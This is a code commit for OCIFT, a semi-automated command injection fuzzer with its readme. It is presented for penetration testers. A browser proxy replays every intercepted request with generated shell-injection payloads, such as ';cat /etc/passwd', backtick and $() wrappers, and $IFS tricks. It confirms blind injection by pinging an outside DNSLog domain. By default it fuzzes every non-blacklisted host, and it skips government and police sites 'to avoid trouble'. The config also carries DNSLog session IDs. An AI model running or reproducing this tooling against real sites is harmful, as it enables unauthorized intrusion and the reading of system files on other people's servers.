update ocift v1.0
dnslog.py (new file, 48 lines added)
@@ -0,0 +1,48 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = Komi

import random
import requests
from string import ascii_lowercase


class DNSLog:
    def __init__(self):
        self.unique = ''
        self.sessionid = ''
        self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)])
        self.headers = {
            'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36",
            'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            'Referer': "http://dnslog.xfkxfk.com/dnslog/",
            'Accept-Encoding': "gzip, deflate, sdch",
            'Cookie': "sessionid={my_sessionid}".format(my_sessionid=self.sessionid),
        }

    def getRandomDomain(self, custom='poc'):
        """
        full domain = [random].[custom].[unique].xfkxfk.com
        e.g. fezarvgo.poc.helloworld.xfkxfk.com
        """
        self.custom = custom
        return '%s.%s.%s.xfkxfk.com' % (self.random, self.custom, self.unique)

    def getDnsRecord(self, timeout=3):
        api_base = 'http://dnslog.xfkxfk.com/dnslog/'
        # refresh the session cookie so a sessionid assigned after __init__
        # (as fuzz.py does) is actually sent with the request
        self.headers['Cookie'] = "sessionid={my_sessionid}".format(my_sessionid=self.sessionid)
        return requests.get(api_base, headers=self.headers, timeout=timeout).content

    def getHttpRecord(self, timeout=3):
        api_base = 'http://dnslog.xfkxfk.com/httplog/'
        self.headers['Cookie'] = "sessionid={my_sessionid}".format(my_sessionid=self.sessionid)
        return requests.get(api_base, headers=self.headers, timeout=timeout).content

    def verifyDNS(self, domain, timeout=3):
        return domain in self.getDnsRecord(timeout)

    def verifyHTTP(self, domain, timeout=3):
        return domain in self.getHttpRecord(timeout)


if __name__ == "__main__":
    dnslog = DNSLog()
    print dnslog.verifyDNS("xfkxfk")
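A minimal usage sketch of the DNSLog helper, not part of the commit itself; the `sessionid` and `unique` values below are placeholders you would take from your own dnslog.xfkxfk.com account (fuzz.py assigns `sessionid` from the `dnslog_sessionid` option in fuzz.conf).

```python
# Sketch only: how the DNSLog helper is meant to be driven.
from dnslog import DNSLog

dnslog = DNSLog()
dnslog.sessionid = 'your-dnslog-session-id'  # placeholder; fuzz.py copies dnslog_sessionid here
dnslog.unique = 'helloworld'                 # placeholder; your unique prefix on dnslog.xfkxfk.com

# e.g. fezarvgo.poc.helloworld.xfkxfk.com; embed this domain in an injected
# command such as ping <domain> so a successful injection triggers a DNS lookup.
probe_domain = dnslog.getRandomDomain(custom='poc')
print probe_domain

# verifyDNS() returns True once the given marker shows up in the DNS log.
print dnslog.verifyDNS('poc')
```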
fuzz.conf (new file, 40 lines added)
@@ -0,0 +1,40 @@
# Configuration options; multi-value options are comma-separated

[initconfig]

# Host blacklist - skipped to avoid unnecessary trouble.
black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com

# Static-file extension blacklist - these URLs are not fuzzed
url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg

# Host whitelist - limits the fuzzing scope; empty (default) means fuzz every host that is not blacklisted.
white_site =172.16.22.92

# Request timeout - limit, in seconds, for each fuzzing request
timeout =10

# My DnsLog address
my_cloudeye =ano1qu2j.xfkxfk.com

# Keywords used to decide whether an injected command executed successfully
checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP

# Base commands used to test for command injection
base_command =cat /etc/resolv.conf,echo 110586256,ipconfig,ping CommandInj.{my_cloudeye}

# Number of fuzzing threads
fuzz_count =20

# Payload type; False (default) means use the custom rules instead of the commix-style ones
commix_payload_type =False

# DnsLog login session ID
dnslog_sessionid =q6wvxls223vykg79vkd4dn2b40zd2d1

# Your Domain
custom_domain =a12s2u2j

# Log file for successful results
Logfile =rce_success_results.txt
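For reference, a short sketch of how these options are consumed; it is not part of the commit, but `LoadConfig` and `ProxyHandler` in run.py do the equivalent.

```python
# Sketch of how fuzz.conf is consumed; note that SafeConfigParser
# lower-cases option names when reading them back.
import ConfigParser

conf = ConfigParser.SafeConfigParser()
conf.read('fuzz.conf')
options = dict(conf.items('initconfig'))

# comma-separated options become lists
black_hosts = options['black_hosts'].split(',')
checkkeys = options['checkkeys'].split(',')

# the {my_cloudeye} placeholder in base_command is filled with the DnsLog domain
base_commands = [cmd.format(my_cloudeye=options['my_cloudeye'])
                 for cmd in options['base_command'].split(',')]
print base_commands
```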
fuzz.py (new file, 214 lines added)
@@ -0,0 +1,214 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 17/3/28 11:15 AM
# @Author  : Komi
# @File    : fuzz.py
# @Ver:    : 0.1

import re
import random
import string
import requests
import threading
import hashlib
from urlparse import urlparse
from dnslog import DNSLog


class CIF_Fuzz(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.timeout = 5
        self.dnslog_sessionid = ''
        self.custom_domain = 'ano1qu2j'
        self.white_site = ['']
        self.url_ext_blacklist = ['']
        self.black_site = ['.gov']
        self.Logfile = ''
        self.my_cloudeye = ""
        self.CheckKey_list = ['']
        self.fuzzing_payloads_list = []
        self.fuzzing_finished_hash = []

    # Hash the request so the same request is not fuzzed twice.
    def HASH_Calc(self, requests_dict):
        md5 = hashlib.md5()
        md5.update(str(requests_dict))
        return md5.hexdigest()

    # Send the fuzzing request and decide whether the injection succeeded.
    def HttpHelper(self, requests_dict, TAG):

        isOver = False
        fuzzing_url = requests_dict['uri']
        headers = requests_dict['headers']

        try:
            if "GET" == requests_dict['method']:
                resp = requests.get(fuzzing_url, headers=headers, timeout=self.timeout)
                result = resp.content
                for key in self.CheckKey_list:
                    if key in result:
                        isOver = True
                        break
            elif "POST" == requests_dict['method']:
                resp = requests.post(fuzzing_url, data=requests_dict['body'], headers=headers, timeout=self.timeout)
                result = resp.content

                for key in self.CheckKey_list:
                    if key in result:
                        isOver = True
                        break

            # Blind case: if the payload carried the DnsLog domain, poll the DNS log for the TAG.
            if self.my_cloudeye in str(requests_dict):
                dnslog = DNSLog()
                dnslog.sessionid = self.dnslog_sessionid
                dnslog.custom = self.custom_domain
                count = 3

                for i in range(count):
                    try:
                        flag = dnslog.verifyDNS(TAG)
                        if flag:
                            isOver = True
                            break
                    except Exception as e:
                        pass

        except Exception as e:
            print "[+] HttpHelper ERROR", e
            isOver = False

        return isOver

    # Fuzz GET requests
    def Fuzzing_GET(self, request):
        fuzzing_payloads = self.fuzzing_payloads_list
        base_url = request['uri']
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", base_url):
            print "[GET] Fuzzing " + match.group("parameter")
            for payload_item in fuzzing_payloads:
                if self.my_cloudeye in payload_item:
                    payload_item = payload_item.replace(self.my_cloudeye, TAG + "." + self.my_cloudeye)

                # ip=1.1.1.1;whoami  (payload appended to the original value)
                fuzzing_uri_append = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")),
                                                      '%s=%s' % (match.group("parameter"), match.group("value") + payload_item))
                request['uri'] = fuzzing_uri_append
                isVuln_a = self.HttpHelper(request, TAG)

                # ip=;whoami  (payload replaces the original value)
                fuzzing_uri_replace = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")),
                                                       '%s=%s' % (match.group("parameter"), payload_item))
                request['uri'] = fuzzing_uri_replace
                isVuln_r = self.HttpHelper(request, TAG)

                # Stop fuzzing this request as soon as either variant succeeds
                if isVuln_a or isVuln_r:
                    self.FileHelper("GET", base_url, match.group("parameter"), payload_item, TAG)
                    print "[+] Fuzzing Done!!"
                    return
        print "[+] Fuzzing Done!!"
        return

    # Fuzz POST requests
    def Fuzzing_POST(self, request):
        fuzzing_payloads = self.fuzzing_payloads_list
        base_url = request['uri']
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        post_body = request['body']
        for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", post_body):
            try:
                print "[POST] Fuzzing " + match.group("parameter")
                for payload_item in fuzzing_payloads:
                    if self.my_cloudeye in payload_item:
                        payload_item = payload_item.replace(self.my_cloudeye, TAG + "." + self.my_cloudeye)
                    payload_item = match.group("value") + payload_item
                    fuzzing_post_body = post_body.replace('%s=%s' % (match.group("parameter"), match.group("value")),
                                                          '%s=%s' % (match.group("parameter"), payload_item))
                    request['body'] = fuzzing_post_body
                    isOver = self.HttpHelper(request, TAG)
                    if isOver:
                        self.FileHelper("POST", base_url, match.group("parameter"), payload_item, TAG)
                        print "[success] Fuzzing Done!!"
                        return
                print "[failed] Fuzzing Done!!"
            except:
                pass
        return

    # Header fuzzing is not supported yet
    def Fuzzing_HEADER(self, request):
        print "Fuzzing HEADER"
        # headers_map = request['headers'].get_all()
        # for (k, v) in headers_map:
        #     print "%s - %s" % (k, v)

    # Write a successful finding to the log file
    def FileHelper(self, HTTP_Method, Rce_URL, parameter, payload, TAG):
        wfile = open(self.Logfile, mode='a+')
        found_rce_text = '''\n\
+==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+
+=+TAG: {TAG}
+=+URL: {RCE_URL}
+=+method: {HTTP_Method}
+=+param: {parameter}
+=+payload: {payload}
+==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+\n
'''
        found_rce_text = found_rce_text.replace("{TAG}", TAG).replace("{RCE_URL}", Rce_URL).replace("{HTTP_Method}", HTTP_Method).replace("{parameter}", parameter).replace("{payload}", payload)

        print found_rce_text

        wfile.write(found_rce_text)
        wfile.write("\r\n")
        wfile.flush()
        wfile.close()

    def check_white_site(self, uri):
        if len(self.white_site) == 0:
            return True
        else:
            for u in self.white_site:
                if u in uri:
                    return True
            return False

    def check_black_site(self, uri):
        for u in self.black_site:
            if u in uri:
                return False
        return True

    def check_url_blackext(self, uri):
        not_staticFlag = True
        url_ext = urlparse(uri).path[-4:].lower()

        if ".js" in uri and ".jsp" not in url_ext:
            not_staticFlag = False
        else:
            for u in self.url_ext_blacklist:
                if u in url_ext:
                    not_staticFlag = False

        return not_staticFlag

    def run(self):
        while True:
            try:
                request = self.queue.get()
                uri = request['uri']
                hash_value = self.HASH_Calc(requests_dict=request)
                is_notstatic = self.check_url_blackext(uri)

                # Only fuzz requests that have not been fuzzed yet, are inside the
                # whitelist, are not blacklisted, and are not static files.
                if hash_value not in self.fuzzing_finished_hash and self.check_white_site(uri) and self.check_black_site(uri) and is_notstatic:
                    self.fuzzing_finished_hash.append(hash_value)
                    method = request['method']
                    if "POST" in method:
                        self.Fuzzing_POST(request)
                    elif "GET" in method:
                        self.Fuzzing_GET(request)
            except:
                pass
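To make the two rewriting variants in `Fuzzing_GET` concrete, here is a standalone illustration (not part of the commit) using the same parameter regex; the target URL and payload are made up.

```python
# Standalone illustration of the Fuzzing_GET rewriting step.
import re

base_url = 'http://testsite.example/index.php?ip=1.1.1.1'   # hypothetical target
payload = ';cat /etc/resolv.conf'                           # one entry from PayloadGenerate

for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", base_url):
    param, value = match.group("parameter"), match.group("value")

    # variant "append": keep the original value and tack the payload on
    # -> index.php?ip=1.1.1.1;cat /etc/resolv.conf
    appended = base_url.replace('%s=%s' % (param, value),
                                '%s=%s' % (param, value + payload))

    # variant "replace": the payload stands in place of the original value
    # -> index.php?ip=;cat /etc/resolv.conf
    replaced = base_url.replace('%s=%s' % (param, value),
                                '%s=%s' % (param, payload))

    print appended
    print replaced
```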
make_payload.py (new file, 129 lines added)
@@ -0,0 +1,129 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 17/3/30 10:34 AM
# @Author  : Komi
# @File    : make_payload.py
# @Ver:    : 0.1


class PayloadGenerate:
    def __init__(self, base_command_list):
        self.base_command = base_command_list
        self.fuzzing_payloads_list = []
        self.fuzzing_finished_url = []

        # The white-spaces
        self.WHITESPACE = ["$IFS", "%20"]

        # The command injection suffixes.
        self.SUFFIXES = ["'", "\""]

        # The command injection separators.
        self.SEPARATORS = [";", "|", "&", "||"]

        # The command injection prefixes.
        self.PREFIXES = ["'", "\""]

    def add_prefixes(self, payload, prefix):
        payload = prefix + payload

        return payload

    def add_suffixes(self, payload, suffix):
        payload = payload + suffix

        return payload

    def add_sp_before(self, payload, sp):
        if payload:
            return sp + payload
        else:
            return ''

    def add_single_quote(self, s):
        if s:
            return "'{}'".format(s)
        else:
            return ''

    def add_double_quotes(self, s):
        if s:
            return '"{}"'.format(s)
        else:
            return ''

    def replace_space(self, payload, whitespace):
        if payload:
            return payload.replace(' ', whitespace)
        else:
            return ''

    # `whoami`
    def add_backquote(self, payload):
        if payload:
            return "`{}`".format(payload)
        else:
            return ''

    # $(reboot)
    def add_brackets(self, payload):
        if payload:
            return "$({})".format(payload)
        else:
            return ''

    # Payload generation adapted from the way commix builds its payloads
    def make_commix_payloads(self, TAG):

        for whitespace in self.WHITESPACE:
            for prefix in self.PREFIXES:
                for suffix in self.SUFFIXES:
                    for sp in self.SEPARATORS:
                        payloads = []
                        p1 = 'echo {}'.format(TAG)
                        p2 = 'echo {}'.format(self.add_single_quote(TAG))
                        p3 = 'echo {}'.format(self.add_double_quotes(TAG))
                        payloads += [p1, p2, p3]

                        payloads += [self.add_sp_before(p1, sp), self.add_sp_before(p2, sp), self.add_sp_before(p3, sp)]
                        payloads += [self.replace_space(p1, whitespace), self.replace_space(p2, whitespace), self.replace_space(p3, whitespace)]
                        payloads += [self.replace_space(self.add_sp_before(p1, sp), whitespace), self.replace_space(self.add_sp_before(p2, sp), whitespace),
                                     self.replace_space(self.add_sp_before(p3, sp), whitespace)]

                        # Fix prefixes / suffixes
                        for payload in payloads:
                            payload = self.add_prefixes(payload, prefix)
                            payload = self.add_suffixes(payload, suffix)

                            self.fuzzing_payloads_list.append(payload)

    # My custom payload rules
    def fuzz_mypayloads(self):
        for whitespace in self.WHITESPACE:
            for prefix in self.PREFIXES:
                for suffix in self.SUFFIXES:
                    for sp in self.SEPARATORS:
                        for cmd in self.base_command:
                            payloads = []
                            # index.php?id=cat /etc/passwd
                            payloads += [cmd]
                            # index.php?id=`cat /etc/passwd`
                            payloads += [self.add_backquote(cmd)]
                            # index.php?id=$(cat /etc/passwd)
                            payloads += [self.add_brackets(cmd)]
                            # index.php?id=;cat /etc/passwd
                            payloads += [self.add_sp_before(cmd, sp)]
                            # index.php?id=;`cat /etc/passwd`
                            payloads += [self.add_sp_before(self.add_backquote(cmd), sp)]
                            # index.php?id=;$(cat /etc/passwd)
                            payloads += [self.add_sp_before(self.add_brackets(cmd), sp)]
                            # index.php?id=cat$IFS/etc/passwd
                            payloads += [self.replace_space(cmd, whitespace)]
                            # index.php?id=;cat$IFS/etc/passwd
                            payloads += [self.replace_space(self.add_sp_before(cmd, sp), whitespace)]
                            # index.php?id='cat /etc/passwd'
                            for payload in payloads:
                                payload = self.add_prefixes(payload, prefix)
                                payload = self.add_suffixes(payload, suffix)

                                self.fuzzing_payloads_list.append(payload)
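A quick way to inspect what `fuzz_mypayloads()` produces (sketch, not part of the commit): feed `PayloadGenerate` a single base command and print a few of the generated variants.

```python
# Sketch: inspect the payloads generated for one base command.
from make_payload import PayloadGenerate

gen = PayloadGenerate(['cat /etc/resolv.conf'])
gen.fuzz_mypayloads()

print "%d payloads generated" % len(gen.fuzzing_payloads_list)
for p in gen.fuzzing_payloads_list[:8]:
    print repr(p)

# Typical entries combine a prefix/suffix quote, a separator and a whitespace
# substitution, e.g. "';cat$IFS/etc/resolv.conf'" or '";cat /etc/resolv.conf"'
```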
readme.md (new file, 114 lines added)
@@ -0,0 +1,114 @@
# OCIFT

A semi-automated command injection vulnerability fuzzing tool (One Semi-automation Command Injection vulnerability Fuzz Tool)

## 1. What is OCIFT

One Semi-automation Command Injection vulnerability Fuzz Tool, OCIFT for short: a semi-automated command injection fuzzing tool.

## 2. What is OCIFT for

It is a semi-automated black-box testing tool. It lets penetration testers and code auditors dig for command injection vulnerabilities in a target application while they simply browse it.

## 3. What makes OCIFT different

* Payloads adapted from the way Commix generates them (still being improved).
* Semi-automated fuzzing driven by a browser proxy.
* Multi-threaded, so fuzzing is fast and does not get in the way of normal browsing.
* Whitelist support to limit the fuzzing scope.
* Blacklist support to avoid unnecessary trouble.
* DNSLog-assisted verification.

## 4. How OCIFT works

A proxy server built on Tornado parses the GET/POST requests passing through it, extracts the fuzzable parameters, and replays each request with the injection payloads. A short sketch of how the pieces fit together follows the file layout below.

* File layout

`➜ cifuzz git:(master) ✗ tree
.
|____run.py main entry point
|____dnslog.py DNSLog SDK
|____fuzz.conf configuration file
|____fuzz.py fuzzing threads
|____make_payload.py payload generator
|____readme.md this document`
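The sketch below is illustration only (the real wiring lives in `ProxyHandler` in run.py): the proxy puts every intercepted request on a queue, and `CIF_Fuzz` worker threads consume it with the payloads built by `PayloadGenerate`. The target URL is hypothetical.

```python
# Illustration only; run.py wires these pieces together from fuzz.conf.
from Queue import Queue
from fuzz import CIF_Fuzz
from make_payload import PayloadGenerate

queue = Queue()

# 1. build the payload list from the base commands
gen = PayloadGenerate(['cat /etc/resolv.conf', 'echo 110586256'])
gen.fuzz_mypayloads()

# 2. start a fuzzing thread that consumes intercepted requests
#    (it loops forever; stop it with Ctrl-C)
worker = CIF_Fuzz(queue=queue)
worker.fuzzing_payloads_list = gen.fuzzing_payloads_list
worker.CheckKey_list = ['110586256', 'nameserver']
worker.url_ext_blacklist = ['.ico', '.css', '.jpg']
worker.Logfile = 'rce_success_results.txt'
worker.start()

# 3. the Tornado proxy handler puts every request it sees on the queue;
#    the URL below is a hypothetical target, not part of the project
queue.put({'uri': 'http://testsite.example/index.php?ip=1.1.1.1',
           'method': 'GET',
           'headers': {},
           'body': None})
```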
## 5. Configuration file

* Options are set in fuzz.conf; multi-value options are comma-separated

`[initconfig]`

* Host blacklist - skipped to avoid unnecessary trouble

`black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com`

* Static-file blacklist - these extensions are not fuzzed

`url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg`

* Host whitelist - limits the fuzzing scope; empty (default) means fuzz every host that is not blacklisted

`white_site =qunar`

* Request timeout - limit, in seconds, for each fuzzing request

`timeout =10`

* My DnsLog address

`my_cloudeye =ano1qu2j.xfkxfk.com`

* Keywords used to decide whether an injected command executed successfully

`checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP`

* Base commands used to test for command injection

`base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256<nul`

* Number of fuzzing threads

`fuzz_count =20`

* Payload type; False (default) means use the custom rules instead of the commix-style ones

`commix_payload_type = False`

* DnsLog login session ID; I use xfkxfk's dnslog.xfkxfk.com

`dnslog_sessionid =q6wva2e3skg79vkdegra2bygft0d1`

* Your Domain

`custom_domain =a2fta2j`

* Log file for successful results

`Logfile =rce_success_results.txt`
## 6. How to use

* 1. Install the dependencies

`pip install tornado
pip install requests`

* 2. Edit fuzz.conf to match your environment
* 3. Start the main program

`python run.py 8089`

As shown below:

![screenshot](http://xxx.com/1.png)

* 4. Point your browser at the proxy

Fuzzing then starts automatically (a script-driven alternative is sketched after this section):

![screenshot](http://xxx.com/2.png)
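If you prefer to drive the proxy from a script instead of a browser, a minimal sketch follows; the target URL is hypothetical and must fall inside your whitelist.

```python
# Sketch: exercise the proxy from a script instead of a browser.
import requests

proxies = {'http': 'http://127.0.0.1:8089'}

# every request sent through the proxy is queued for fuzzing
requests.get('http://testsite.example/index.php?ip=1.1.1.1',
             proxies=proxies, timeout=10)
```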
## 7. Summary

* The semi-automated fuzzing workflow basically works as intended
* The payloads still need continuous tuning
run.py (new file, 292 lines added)
@@ -0,0 +1,292 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 17/4/8 00:00
# @Author  : Komi
# @File    : run.py
# @Ver:    : 0.1

helpinfo = '''\
##########################################################
#      _____   ______   ___   _____  __      __          #
#     / ___ \ / ____/   | |  |_    _ |  |_____|          #
#    / /   \ \ / /      | |    |  |_ |  |                #
#   |  \___ / /   | \ ____ |  |  | _| |  |               #
#    \ __ __/  \ ____ /  |___| |_| |___|  v1.0           #
##########################################################
# A semi-automated command injection vulnerability fuzzing tool
Named From: OCIFT (OS Command Injection Fuzzy Tool)
References:
    https://github.com/commixproject/commix
    https://www.owasp.org/index.php/Command_Injection
Instructions:
    1. python run.py 8081  (open port 8081 as the proxy port)
    2. Configure your browser to use the proxy address http://127.0.0.1:8081
    3. Results are written to the log file, by default: rce_success_results.txt
'''
print helpinfo

import logging
import socket
import string
import random
from urlparse import urlparse
import os, sys
from Queue import Queue
import threading
import tornado.httpserver
import tornado.ioloop
import tornado.iostream
import tornado.web
from tornado.web import RequestHandler
import tornado.httpclient
from fuzz import CIF_Fuzz
from make_payload import PayloadGenerate
import ConfigParser

# logging.basicConfig(level=logging.ERROR)


class ProxyManage:
    def run_proxy(self, address, port, handler):
        '''
        Start proxy server
        '''
        app = tornado.web.Application([
            (r'.*', handler),
        ])
        app.listen(port, address)
        logging.info("Starting HTTP proxy on {0}".format(address + ':' + str(port)))
        ioloop = tornado.ioloop.IOLoop.instance()
        ioloop.start()

    def close_proxy(self):
        ioloop = tornado.ioloop.IOLoop.instance()
        logging.info('stop proxy server')
        ioloop.stop()


def get_proxy(url):
    url_parsed = urlparse(url, scheme='http')
    proxy_key = '%s_proxy' % url_parsed.scheme
    return os.environ.get(proxy_key)


def parse_proxy(proxy):
    proxy_parsed = urlparse(proxy, scheme='http')
    return proxy_parsed.hostname, proxy_parsed.port


def fetch_request(url, callback, **kwargs):
    proxy = get_proxy(url)
    if proxy:
        tornado.httpclient.AsyncHTTPClient.configure(
            'tornado.curl_httpclient.CurlAsyncHTTPClient')
        host, port = parse_proxy(proxy)
        kwargs['proxy_host'] = host
        kwargs['proxy_port'] = port

    req = tornado.httpclient.HTTPRequest(url, **kwargs)
    client = tornado.httpclient.AsyncHTTPClient()
    client.fetch(req, callback, raise_error=False)


class LoadConfig:
    def __init__(self):
        self.version = "V1.0"

    def read_config(self):
        self.conf = ConfigParser.SafeConfigParser()
        self.conf.read('fuzz.conf')
        self.initconfig = self.conf.items('initconfig')

    def get_configprperity(self, key=""):
        # ConfigParser lower-cases option names, so compare case-insensitively
        # (otherwise the 'Logfile' lookup below would return None)
        for tmp in self.initconfig:
            if key != "" and key.lower() == tmp[0].lower():
                return tmp[1]


class ProxyHandler(RequestHandler):
    SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT', "OPTIONS"]
    queue = Queue()
    print "[+] Load configuration file..."

    londconf = LoadConfig()
    londconf.read_config()
    londconf.get_configprperity()

    my_cloudeye = londconf.get_configprperity('my_cloudeye')
    white_site = londconf.get_configprperity('white_site')
    black_site = londconf.get_configprperity('black_hosts')
    checkkeys = londconf.get_configprperity('checkkeys')
    checkkey_list = checkkeys.split(",")
    fuzz_count = londconf.get_configprperity('fuzz_count')
    custom_domain = londconf.get_configprperity('custom_domain')
    dnslog_sessionid = londconf.get_configprperity('dnslog_sessionid')
    commix_payload_type = londconf.get_configprperity('commix_payload_type')
    url_ext_black = londconf.get_configprperity('url_ext_black')

    Logfile = londconf.get_configprperity('Logfile')

    base_command = londconf.get_configprperity("base_command")

    base_command_list = []
    for base_command in base_command.split(","):
        base_command_list.append(base_command.format(my_cloudeye=my_cloudeye))

    timeout = londconf.get_configprperity("timeout")
    print "[+] Initialize Payloads..."
    PayloadME = PayloadGenerate(base_command_list)
    if commix_payload_type == "False":
        PayloadME.fuzz_mypayloads()
    else:
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
        PayloadME.make_commix_payloads(TAG=TAG)
        checkkey_list.append(TAG)

    fuzzing_payloads_list = list(set(PayloadME.fuzzing_payloads_list))
    print "[+] we have %s payloads " % len(fuzzing_payloads_list)

    print "[+] Start Fuzzing Threads..."
    for i in range(0, int(fuzz_count)):
        cifz = CIF_Fuzz(queue=queue)
        # use the de-duplicated payload list computed above
        cifz.fuzzing_payloads_list = fuzzing_payloads_list
        cifz.CheckKey_list = checkkey_list
        cifz.my_cloudeye = my_cloudeye
        cifz.url_ext_blacklist = url_ext_black.split(",")
        cifz.dnslog_sessionid = dnslog_sessionid
        cifz.Logfile = Logfile
        cifz.custom_domain = custom_domain
        cifz.white_site = white_site.split(",")
        cifz.black_site = black_site.split(",")
        cifz.timeout = int(timeout)
        cifz.start()
    print "[+] Everything is ready."

    @tornado.web.asynchronous
    def get(self):
        def handle_response(response):
            if (response.error and not
                    isinstance(response.error, tornado.httpclient.HTTPError)):
                self.set_status(500)
                self.write('Internal server error:\n' + str(response.error))
            else:
                self.set_status(response.code, response.reason)
                self._headers = tornado.httputil.HTTPHeaders()  # clear tornado default header

                for header, v in response.headers.get_all():
                    if header not in ('Content-Length', 'Transfer-Encoding', 'Content-Encoding', 'Connection'):
                        self.add_header(header, v)  # some headers appear multiple times, e.g. 'Set-Cookie'

                if response.body:
                    self.set_header('Content-Length', len(response.body))
                    self.write(response.body)
            self.finish()

        body = self.request.body
        if not body:
            body = None

        try:

            if 'Proxy-Connection' in self.request.headers:
                del self.request.headers['Proxy-Connection']

            fetch_request(
                self.request.uri, handle_response,
                method=self.request.method, body=body,
                headers=self.request.headers, follow_redirects=False,
                allow_nonstandard_methods=True)

            # hand a copy of the intercepted request to the fuzzing threads
            request_dict = {}
            request_dict['uri'] = self.request.uri
            request_dict['method'] = self.request.method
            request_dict['headers'] = self.request.headers
            request_dict['body'] = body
            self.queue.put(request_dict)

        except tornado.httpclient.HTTPError as e:
            if hasattr(e, 'response') and e.response:
                handle_response(e.response)
            else:
                self.set_status(500)
                self.write('Internal server error:\n' + str(e))
                self.finish()

    @tornado.web.asynchronous
    def post(self):
        return self.get()

    @tornado.web.asynchronous
    def options(self):
        return self.get()

    @tornado.web.asynchronous
    def connect(self):
        host, port = self.request.uri.split(':')
        client = self.request.connection.stream

        def read_from_client(data):
            upstream.write(data)

        def read_from_upstream(data):
            client.write(data)

        def client_close(data=None):
            if upstream.closed():
                return
            if data:
                upstream.write(data)
            upstream.close()

        def upstream_close(data=None):
            if client.closed():
                return
            if data:
                client.write(data)
            client.close()

        def start_tunnel():
            client.read_until_close(client_close, read_from_client)
            upstream.read_until_close(upstream_close, read_from_upstream)
            client.write(b'HTTP/1.0 200 Connection established\r\n\r\n')

        def on_proxy_response(data=None):
            if data:
                first_line = data.splitlines()[0]
                http_v, status, text = first_line.split(None, 2)
                if int(status) == 200:
                    start_tunnel()
                    return

            self.set_status(500)
            self.finish()

        def start_proxy_tunnel():
            upstream.write('CONNECT %s HTTP/1.1\r\n' % self.request.uri)
            upstream.write('Host: %s\r\n' % self.request.uri)
            upstream.write('Proxy-Connection: Keep-Alive\r\n\r\n')
            upstream.read_until('\r\n\r\n', on_proxy_response)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        upstream = tornado.iostream.IOStream(s)

        proxy = get_proxy(self.request.uri)
        if proxy:
            proxy_host, proxy_port = parse_proxy(proxy)
            upstream.connect((proxy_host, proxy_port), start_proxy_tunnel)
        else:
            upstream.connect((host, int(port)), start_tunnel)


class RunProxyThread(threading.Thread):
    def __init__(self, handler, host, port):
        self.host = host
        self.port = port
        self.handler = handler
        threading.Thread.__init__(self)

    def run(self):
        ProxyManage().run_proxy(self.host, self.port, self.handler)


if __name__ == "__main__":
    port = 8888
    if len(sys.argv) > 1:
        port = int(sys.argv[1])
    print "[*] Starting HTTP proxy at: http://127.0.0.1:%d" % port

    RunProxyThread(ProxyHandler, '127.0.0.1', int(port)).run()